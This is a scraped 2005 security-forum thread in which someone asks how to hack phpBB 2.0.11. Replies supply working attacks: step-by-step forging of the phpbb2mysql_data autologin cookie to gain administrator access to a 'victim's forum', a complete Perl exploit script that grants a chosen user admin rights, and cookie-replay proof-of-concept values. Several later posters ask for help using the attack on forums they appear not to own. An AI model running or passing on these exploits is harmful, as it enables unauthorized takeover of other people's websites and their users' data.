|
|
|
|
|
|
IT Security and Insecurity Portal |
|
|
The easiest way to hack phpbb 2.0.11 ? |
|
Posted: Fri Jul 22, 2005 8:33 pm |
|
|
Bambi |
Beginner |
|
|
Joined: Jul 22, 2005 |
Posts: 1 |
|
|
|
|
|
|
|
Hello everybody !
Can someone tell me what is the easiest way to hack a phpbb 2.0.11 ?
Thank you so much in advance ! |
|
|
|
|
|
|
|
|
Posted: Sat Jul 23, 2005 12:21 am |
|
|
howitzer |
Regular user |
|
|
Joined: Jun 25, 2005 |
Posts: 23 |
|
|
|
|
|
|
|
** YOU DON'T HAVE TO REGISTER AT THE VICTIM'S FORUM..
1- Simply VISIT the forum using Mozilla Firefox.. and be sure that the cookie is made (:
3- Close the Browser ..
2- Open the cookies.txt ..((located on "C:\Documents and Settings\ALI\Application Data\Mozilla\Firefox\Profiles\ur4nn6o5.default" when using WinXP)) in example Wink
and you will find something like :
---------------------------------------------------------------------------------------------------------------\\
127.0.0.1 FALSE / FALSE 1141920503 phpbb2mysql_data a%3A0%3A%7B%7D
---------------------------------------------------------------------------------------------------------------//
where 127.0.0.1 is the domain for the forum << tested on localhost
and a%3A0%3A%7B%7D is the cookie data ..<< as a visitor
3- ok..let's do it !! ..
now open cookies.txt with your text editor
and replace
---------------------------------------------------------------------------------------------------------------\\
127.0.0.1 FALSE / FALSE 1141920503 phpbb2mysql_data a%3A0%3A%7B%7D
---------------------------------------------------------------------------------------------------------------//
with
---------------------------------------------------------------------------------------------------------------\\
127.0.0.1 FALSE / FALSE 1141920503 phpbb2mysql_data a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D
---------------------------------------------------------------------------------------------------------------//
save the cookies.txt..
4- Open your Browser..and go to the exploited forum ..
>>enjoy Hi Permission mode !! Very Happy
complete the mission by clicking " Go to Administration Panel "
http://www.waraxe.us/ftopict-610.html |
|
|
|
|
|
|
|
|
Posted: Sun Jul 24, 2005 4:40 pm |
|
|
t2k |
Beginner |
|
|
Joined: Jul 24, 2005 |
Posts: 1 |
|
|
|
|
|
|
|
Hi,
i try to use this way on this forum:
Code: | Powered by phpBB 2.0.3 ? 2001, 2002 phpBB Group |
but nothing happened
sry, maybe stupid question, but must i chance this:
Code: | a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D |
What else can i use for this forum?
thank you |
|
|
|
|
Posted: Mon Jul 25, 2005 1:05 am |
|
|
howitzer |
Regular user |
|
|
Joined: Jun 25, 2005 |
Posts: 23 |
|
|
|
|
|
|
|
Man there is plenty possibilities , exploits ... etc
www.milw0rm.com check. |
|
|
|
|
|
|
|
|
Posted: Thu Aug 18, 2005 8:54 pm |
|
|
ANc |
Beginner |
|
|
Joined: Aug 18, 2005 |
Posts: 1 |
|
|
|
|
|
|
|
Just don't be so stupid...
good luck
Quote: | #!/usr/bin/perl -w
# phpBB <=2.0.12 session autologin exploit
# This script uses the vulerability in autologinid variable
# More: http://www.phpbb.com/phpBB/viewtopic.php?f=14&t=267563
#
# Just gives an user on vulnerable forum administrator rights.
# You should register the user before using this
# by Kutas, kutas@mail15.com
#P.S. I dont know who had made an original exploit, so I cannot place no (c) here...
# but greets goes to Paisterist who made an exploit for Firefox cookies...
if (@ARGV < 3)
{
print q(
+++++++++++++++++++++++++++++++++++++++++++++++++++
Usage: perl nenu.pl [site] [phpbb folder] [username] [proxy (optional)]
i.e. perl nenu.pl www.site.com /forum/ BigAdmin 127.0.0.1:3128
++++++++++++++++++++++++++++++++++++++++++++++++++++
);
exit;
}
use strict;
use LWP::UserAgent;
my $host = $ARGV[0];
my $path = $ARGV[1];
my $user = $ARGV[2];
my $proxy = $ARGV[3];
my $request = "http://";
$request .= $host;
$request .= $path;
use HTTP::Cookies;
my $browser = LWP::UserAgent->new ();
my $cookie_jar = HTTP::Cookies->new( );
$browser->cookie_jar( $cookie_jar );
$cookie_jar->set_cookie( "0","phpbb2mysql_data", "a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D", "/",$host,,,,,);
if ( defined $proxy) {
$proxy =~ s/(http:\/\/)//eg;
$browser->proxy("http" , "http://$proxy");
}
print "++++++++++++++++++++++++++++++++++++\n";
print "Trying to connect to $host$path"; if ($proxy) {print "using proxy $proxy";}
my $response = $browser->get($request);
die "Error: ", $response->status_line
unless $response->is_success;
if($response->content =~ m/phpbbprivmsg/) {
print "\n Forum is vulnerable!!!\n";
} else {
print "Sorry... Not vulnerable"; exit();}
print "+++++++++++++++++++++++++++++\nTrying to get the user:$user ID...\n";
$response->content =~ /sid=([\w\d]*)/;
my $sid = $1;
$request .= "admin\/admin_ug_auth.php?mode=user&sid=$sid";
$response = $browser->post(
$request,
[
'username' => $user,
'mode' => 'edit',
'mode' => 'user',
'submituser' => 'Look+up+User'
],
);
die "Error: ", $response->status_line
unless $response->is_success;
if ($response->content =~ /name="u" value="([\d]*)"/)
{print " Done... ID=$1\n++++++++++++++++++++++++++++++\n";}
else {print "No user $user found..."; exit(); }
my $uid = $1;
print "Trying to give user:$user admin status...\n";
$response = $browser->post(
$request,
[
'userlevel' => 'admin',
'mode' => 'user',
'adv'=>'',
'u'=> $uid,
'submit'=> 'Submit'
],
);
die "Error: ", $response->status_line
unless $response->is_success;
print " Well done!!! $user should now have an admin status..\n++++++++++++++++++++++++++++"; | [/quote] |
|
|
|
|
|
|
|
|
Posted: Fri Aug 19, 2005 12:48 am |
|
|
700G |
Active user |
|
|
Joined: Mar 25, 2005 |
Posts: 33 |
|
|
|
|
|
|
|
t2k wrote: | Hi,
i try to use this way on this forum:
Code: | Powered by phpBB 2.0.3 ? 2001, 2002 phpBB Group |
but nothing happened
sry, maybe stupid question, but must i chance this:
Code: | a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D |
What else can i use for this forum?
thank you |
Even if its says "2.0.3" the forum could be patched. |
|
|
|
|
Posted: Thu Oct 13, 2005 1:49 am |
|
|
M1n1stry |
Beginner |
|
|
Joined: Oct 13, 2005 |
Posts: 3 |
|
|
|
|
|
|
|
Hi howitzer,
Im new here and I tried what you said, and I noticed the "Go To Adminstation Panel" link was visible, so I clicked on it, but what do you do when you are asked for a User Name and Pasword?
Thanks for your help! |
|
|
|
|
Posted: Thu Oct 13, 2005 2:30 pm |
|
|
bej |
Beginner |
|
|
Joined: Oct 11, 2005 |
Posts: 3 |
|
|
|
|
|
|
|
You won't find any vulnerable websites. This vulnerability is old as shit, and anyone who cares has updated already. |
|
|
|
|
Posted: Thu Oct 13, 2005 11:43 pm |
|
|
y3dips |
Valuable expert |
|
|
Joined: Feb 25, 2005 |
Posts: 281 |
Location: Indonesia |
|
|
|
|
|
|
M1n1stry wrote: | Hi howitzer,
Im new here and I tried what you said, and I noticed the "Go To Adminstation Panel" link was visible, so I clicked on it, but what do you do when you are asked for a User Name and Pasword?
Thanks for your help! |
it means the forum already patched , so u need to re-authenticate to log in as admin, please read abut it , try google for good answer |
|
_________________ IO::y3dips->new(http://clog.ammar.web.id); |
|
|
|
Posted: Fri Oct 14, 2005 8:24 am |
|
|
M1n1stry |
Beginner |
|
|
Joined: Oct 13, 2005 |
Posts: 3 |
|
|
|
|
|
|
|
|
|
|
|
Posted: Sat Oct 22, 2005 5:56 pm |
|
|
lak1s |
Regular user |
|
|
Joined: Oct 22, 2005 |
Posts: 11 |
|
|
|
|
|
|
|
i do it but i cant see go to admin panel, can soemone give me an example URL from control panel i wll try go imediately in thx |
|
|
|
|
|
|
|
|
Posted: Thu Oct 27, 2005 4:22 pm |
|
|
s3s10n |
Beginner |
|
|
Joined: Oct 27, 2005 |
Posts: 3 |
|
|
|
|
|
|
|
The easy way is this:
- get Mozilla firefox!
- install Live http headers plug-in ( http://livehttpheaders.mozdev.org/ )
- open the live http header option. Go to the phpbb board. Scroll to the top in the header, click replay in the index.php header (cookie: phpbb2mysql_t=a ), copy and paste this values:
The following proof of concept demonstrating cookie values necessary to authenticate to the numerical id '2' account, typically the administrator account, is available:
a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D
or:
The following proof of concept was supplied by Dim K0r0l <dim@acolytez.com>:
a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A32%3A%22%22%3Bs%3A6%3A%22userid%22%3Bs%3A4%3A%22[id]%22%3B%7D
click on replay again in that window and you're now logged in as the admin (user id 2) of the board. |
|
|
|
|
|
|
|
|
Posted: Sat Nov 19, 2005 7:09 pm |
|
|
Rodney |
Beginner |
|
|
Joined: Nov 19, 2005 |
Posts: 1 |
|
|
|
|
|
|
|
Hello guys, I'm new here and have some problems with changing the cookie for phpBB 2.0.11. I do have Firefox and live http header installed and I can change the cookie but the only change I get is that I'm getting http://XXXXXXXXXX/phpBB2/templates/subSilver/images/cellpic2.jpg (I've XXX the name of the page) when I alter the cookie with %3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D. Also on the cookie it reads Cookie: phpbb2mysql_data and not phpbb2mysql_t=a. So what is going wrong? |
|
|
|
|
|
|
|
|
Posted: Sat Dec 03, 2005 1:43 am |
|
|
webguy714 |
Beginner |
|
|
Joined: Dec 03, 2005 |
Posts: 4 |
|
|
|
|
|
|
|
Much thnx my friend...was testing out this exploit on a beta forum we have set up and it worked like a charm!!!!!
howitzer wrote: | ** YOU DON'T HAVE TO REGISTER AT THE VICTIM'S FORUM..
1- Simply VISIT the forum using Mozilla Firefox.. and be sure that the cookie is made (:
3- Close the Browser ..
2- Open the cookies.txt ..((located on "C:\Documents and Settings\ALI\Application Data\Mozilla\Firefox\Profiles\ur4nn6o5.default" when using WinXP)) in example Wink
and you will find something like :
---------------------------------------------------------------------------------------------------------------\\
127.0.0.1 FALSE / FALSE 1141920503 phpbb2mysql_data a%3A0%3A%7B%7D
---------------------------------------------------------------------------------------------------------------//
where 127.0.0.1 is the domain for the forum << tested on localhost
and a%3A0%3A%7B%7D is the cookie data ..<< as a visitor
3- ok..let's do it !! ..
now open cookies.txt with your text editor
and replace
---------------------------------------------------------------------------------------------------------------\\
127.0.0.1 FALSE / FALSE 1141920503 phpbb2mysql_data a%3A0%3A%7B%7D
---------------------------------------------------------------------------------------------------------------//
with
---------------------------------------------------------------------------------------------------------------\\
127.0.0.1 FALSE / FALSE 1141920503 phpbb2mysql_data a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D
---------------------------------------------------------------------------------------------------------------//
save the cookies.txt..
4- Open your Browser..and go to the exploited forum ..
>>enjoy Hi Permission mode !! Very Happy
complete the mission by clicking " Go to Administration Panel "
http://www.waraxe.us/ftopict-610.html |
|
|
|
|
|
|
|
|
|
Posted: Sat Dec 03, 2005 1:43 am |
|
|
webguy714 |
Beginner |
|
|
Joined: Dec 03, 2005 |
Posts: 4 |
|
|
|
|
|
|
|
Much thnx my friend...was testing out this exploit on a beta forum we have set up and it worked like a charm!!!!!
howitzer wrote: | ** YOU DON'T HAVE TO REGISTER AT THE VICTIM'S FORUM..
1- Simply VISIT the forum using Mozilla Firefox.. and be sure that the cookie is made (:
3- Close the Browser ..
2- Open the cookies.txt ..((located on "C:\Documents and Settings\ALI\Application Data\Mozilla\Firefox\Profiles\ur4nn6o5.default" when using WinXP)) in example Wink
and you will find something like :
---------------------------------------------------------------------------------------------------------------\\
127.0.0.1 FALSE / FALSE 1141920503 phpbb2mysql_data a%3A0%3A%7B%7D
---------------------------------------------------------------------------------------------------------------//
where 127.0.0.1 is the domain for the forum << tested on localhost
and a%3A0%3A%7B%7D is the cookie data ..<< as a visitor
3- ok..let's do it !! ..
now open cookies.txt with your text editor
and replace
---------------------------------------------------------------------------------------------------------------\\
127.0.0.1 FALSE / FALSE 1141920503 phpbb2mysql_data a%3A0%3A%7B%7D
---------------------------------------------------------------------------------------------------------------//
with
---------------------------------------------------------------------------------------------------------------\\
127.0.0.1 FALSE / FALSE 1141920503 phpbb2mysql_data a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D
---------------------------------------------------------------------------------------------------------------//
save the cookies.txt..
4- Open your Browser..and go to the exploited forum ..
>>enjoy Hi Permission mode !! Very Happy
complete the mission by clicking " Go to Administration Panel "
http://www.waraxe.us/ftopict-610.html |
|
|
|
|
|
|
www.waraxe.us Forum Index -> PhpBB
You cannot post new topics in this forum You cannot reply to topics in this forum You cannot edit your posts in this forum You cannot delete your posts in this forum You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 3
Goto page 1, 2, 3Next
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|